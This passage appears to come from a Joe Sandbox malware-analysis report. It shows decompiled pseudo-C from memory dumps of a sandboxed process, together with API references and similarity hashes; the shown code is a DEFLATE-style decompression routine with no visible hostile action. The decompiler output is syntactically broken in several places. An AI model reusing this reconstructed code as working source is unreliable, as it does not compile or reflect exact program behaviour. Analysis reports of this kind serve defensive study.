												} else {
													while(1) {
														L208:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															break;
														}
														L209:
														_t596 = ( *_t841 & 0x000000ff) << _t1043;
														_t841 = _t841 + 1;
														_t903 =  *(_t1058 - 0x38);
														_t1006 = _t1006 | _t596;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 0x18) = _t841;
														 *(_t1058 - 4) = _t1006;
														__eflags = _t1043 - _t903;
														if(_t1043 < _t903) {
															continue;
														} else {
															L210:
															_t596 =  *(_t1058 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1022 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t764 =  *(_t1058 - 8);
												__eflags = _t764;
												if(_t764 == 0) {
													L268:
													_t684 = _t764 | 0xffffffff;
													 *_t1022 = 0x11;
													goto L291;
												} else {
													L206:
													_t596 =  *(_t1058 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t908 =  *(_t1058 - 8);
											 *(_t1022 + 0x2924 + _t908) = _t596;
											_t902 = _t908 + 1;
											continue;
										}
									} else {
										L181:
										__eflags =  *(_t1058 - 0x20) - _t841 - 2;
										if( *(_t1058 - 0x20) - _t841 >= 2) {
											L195:
											_t1010 =  *(_t841 + 1) & 0x000000ff;
											_t767 =  *_t841 & 0x000000ff;
											_t841 = _t841 + 2;
											_t902 = _t1057;
											 *(_t1058 - 0x18) = _t841;
											 *(_t1058 - 4) =  *(_t1058 - 4) | _t1010 << _t1057 + 0x00000008 | _t767 << _t902;
											_t1057 = _t1057 + 0x10;
											__eflags = _t1057;
											_t1006 =  *(_t1058 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t596 = _t1006 & 0x000003ff;
												_t1033 =  *((short*)(_t1022 + 0x1ca0 + _t596 * 2));
												__eflags = _t1033;
												if(_t1033 < 0) {
													L186:
													__eflags = _t1057 - 0xa;
													if(_t1057 <= 0xa) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1058 - 0x24) = _t902;
														while(1) {
															L189:
															_t1033 =  *((short*)( *(_t1058 - 0x14) + 0x24a0 + ((_t1006 >> _t902 & 0x00000001) +  !_t1033) * 2));
															_t902 =  *(_t1058 - 0x24) + 1;
															 *(_t1058 - 0x24) = _t902;
															__eflags = _t1033;
															if(_t1033 >= 0) {
																goto L196;
															}
															L190:
															_t596 = _t902 + 1;
															__eflags = _t1057 - _t596;
															if(_t1057 >= _t596) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1035 = _t1033 >> 9;
													__eflags = _t1035;
													if(_t1035 == 0) {
														L191:
														_t1022 =  *(_t1058 - 0x14);
														L192:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L250:
															 *_t1022 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														__eflags = _t1057 - _t1035;
														if(_t1057 >= _t1035) {
															L196:
															_t1022 =  *(_t1058 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t902 = _t1057;
												_t771 = ( *_t841 & 0x000000ff) << _t902;
												_t841 = _t841 + 1;
												_t1006 = _t1006 | _t771;
												 *(_t1058 - 0x18) = _t841;
												_t1057 = _t1057 + 8;
												 *(_t1058 - 4) = _t1006;
												__eflags = _t1057 - 0xf;
											} while (_t1057 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1007 =  *(_t1022 + 0x2c);
								_t743 =  *(_t1022 + 0x30) + _t1007;
								__eflags = _t743 - _t902;
								if(_t743 != _t902) {
									L269:
									_t684 = _t743 | 0xffffffff;
									 *_t1022 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1022 + 0x40, _t1022 + 0x2924, _t1007);
									_t749 =  *(_t1022 + 0x2c) + 0x2924 + _t1022;
									__eflags = _t749;
									memcpy(_t1022 + 0xde0, _t749,  *(_t1022 + 0x30));
									_t1061 = _t1061 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L149:
						__eflags = _t901 - 1;
						if(_t901 > 1) {
							L267:
							 *(_t1058 - 0xc) = 0xffffffff;
							 *_t1022 = 0x23;
							goto L292;
						} else {
							goto L150;
						}
					}
					goto L295;
				}
			}

APIs

memset.NTDLL ref: 00115BDE
memset.NTDLL ref: 00115C6D
memset.NTDLL ref: 00115C83
memset.NTDLL ref: 00115C99

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a3d66f63e321766c0b80a8adcbe42f8cd07f3bd34be6beff94fda54fc15a2231
Instruction ID: 9877de99cce9693bd32c8de9c59d21e0c7c38b32b38cb2ad62f5ef99006f22a1
Opcode Fuzzy Hash: a3d66f63e321766c0b80a8adcbe42f8cd07f3bd34be6beff94fda54fc15a2231
Instruction Fuzzy Hash: 6D31B1B5E04615EBDB08CF64C891BEDBBB6BF88314F144069E502A7680D374A6D1CFD4

Uniqueness

Uniqueness Score: 0.00%

Function 00115A85, Relevance: 5.1, APIs: 4, Instructions: 79
COMMON

C-Code - Quality: 68%

			E00115A85(void* __eax, void* __ebx, void* __edi) {
				intOrPtr* _t597;
				void* _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				void* _t608;
				signed int _t609;
				signed int _t612;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t624;
				signed int _t625;
				void* _t628;
				signed int _t630;
				void* _t631;
				signed int _t641;
				signed int* _t651;
				signed int _t654;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x121ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x121af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x121ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x301333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x121010);
										_t609 =  *(_t608 + 0x121a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x3012ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x121090 + _t617 * 4);
												_t618 =  *(0x121110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x3012f7;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x121004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x121004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x121a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x121004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x121a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x3013af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
